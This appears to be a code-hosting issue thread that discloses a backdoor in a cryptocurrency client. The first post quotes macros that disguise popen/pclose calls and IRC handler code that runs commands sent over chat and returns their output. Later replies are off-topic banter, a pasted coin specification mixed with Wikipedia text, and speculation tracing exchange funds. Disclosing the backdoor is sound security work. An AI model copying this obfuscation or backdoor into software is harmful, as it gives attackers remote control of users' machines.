backdoor in IRC code

[dooglus]

There's a backdoor in the IRC code that gives the attacker the ability to run arbitrary commands on the victim's host.

In src/allocators.h we see these macros being defined, in an attempt to hide 'popen' and 'pclose' calls:

/** Determine system page size in bytes */
#define S_ORDER(a,b,c,d) b##a##d##c

/**
 * OS-dependent memory page locking/unlocking.
 * Defined as policy class to make stubbing for test possible.
 */
#define CLine S_ORDER(I,F,E,L)

/**
 * Singleton class to keep track of locked (ie, non-swappable) memory pages, for use in
 * std::allocator templates.
 */
#define CRead S_ORDER(p,po,n,e)
#define CFree S_ORDER(cl,p,e,os)

//
// Allocator that locks its contents from being paged
// out of memory and clears its contents before deletion.
//
#define CBuff "PR" "IV" "M" "SG"

Then in irc.cpp they are used to implement the backdoor:

        if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
        {
            CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
            if (buf) {
                std::string result = "";
                while (!feof(buf))
                    if (fgets(pszName, sizeof(pszName), buf) != NULL)
                        result += pszName;
                CFree(buf);
                strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
                if (strchr(pszName, '!'))
                    *strchr(pszName, '!') = '\0';
                Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
            }
        }

I expect this is a known issue since this kind of thing doesn't happen accidentally.

[BitPopCoin]

lol remember when this shitcoin exchange still existed and had people defending it

So long ago

[n4ru]

lol remember when this shitcoin exchange still existed and had people defending it

fancy seeing you here

[ctrlcctrlv]

those sure are words

[Glittergates]

The 777-coins block occurs approximately 3-8% and 7777-coins block occurs approximately 0.5-2%, depends on the blockchain "luck". So have fun and hope for luck 7s!

Lucky7Coin also provides 5% annual interest on the coins held. The interest is paid about every 2 weeks.

No Premine.

Specifications: - 60 seconds block target - 77 coins per block for normal blocks - 777 or 7777 coins per block for super blocks depends on the number of lucky 7s - Difficulty retargets every block - mining payout will be halved every half year (259200 blocks) - mining coins per block will not be lower than 1 coin per block - Expected total mined coins will be 99,792,000 coins - 7 confirmations for transaction - 77 confirmations for minted blocks - Total coins (hard limit): 500 millions

The unit of account of the bitcoin system is the bitcoin. Currency codes for representing bitcoin are BTC[a] and XBT.[b][23]: 2  Its Unicode character is ₿.[1] One bitcoin is divisible to eight decimal places.[6]: ch. 5  Units for smaller amounts of bitcoin are the millibitcoin (mBTC), equal to 1⁄1000 bitcoin, and the satoshi (sat), which is the smallest possible division, and named in homage to bitcoin's creator, representing 1⁄100000000 (one hundred millionth) bitcoin.[2] 100,000 satoshis are one mBTC

7x7x7 =343 =

[justinvforvendetta]

this code wasnt built by vern

[ctrlcctrlv]

yum word salad

[Glittergates]

alot of spectators what i figured

[karelbilek]

what the hell is this, I get 20 notifs in last 1 hour...

[Glittergates]

Link too my bitcoin https://www.blockchain.com/btc/tx/c7b46a79fd8887038bd3a8e884b04820038415a60e0b9d2c2f5bcff68a2687bf

[ctrlcctrlv]

@karelbilek looks like a psychotic break

[ctrlcctrlv]

indeed, i'm not a doctor so i can't diagnose any disease, i can only express that i am observing a symptom in you. just like "my friend coughed" — non-doctor describing a symptom.

[Glittergates]

I'am here for my money nothing more https://www.blockchain.com/btc/tx/c7b46a79fd8887038bd3a8e884b04820038415a60e0b9d2c2f5bcff68a2687bf

[rascal777]

Looks like the Cryptsy funds have been moving.

[Glittergates]

Thats crazy post the transactions of block

[Glittergates]

Looks like the Cryptsy funds have been moving.

Thats crazy post the transactions of block

[rascal777]

Looks like coins have been spread out using a mixer. Hopefully this address has been red Flagged in the Bitcoin system, if that is possible. For example, Here is one address containing some split off funds: bc1qvmt6qcky062j4hhvgvmdx22kgws4rk7gafeauz or https://www.blockchain.com/explorer/addresses/btc/bc1qvmt6qcky062j4hhvgvmdx22kgws4rk7gafeauz

[rascal777]

Actually, looks like a lot of the transactions got sent to Binance? So Binance should know whos account this is. for example this transaction: https://www.blockchain.com/explorer/transactions/btc/1ebcc90100d82b1e5b1ea8434e2c092dc9a5cb601cc613a5c5508d6892f7e7d1 The Transaction before this one shows 2 Bitcoins sent to Binance. https://www.blockchain.com/explorer/transactions/btc/914e44c2af89fb27ba8a8b83e079c7510baec45459ce78a7372170ae8c181698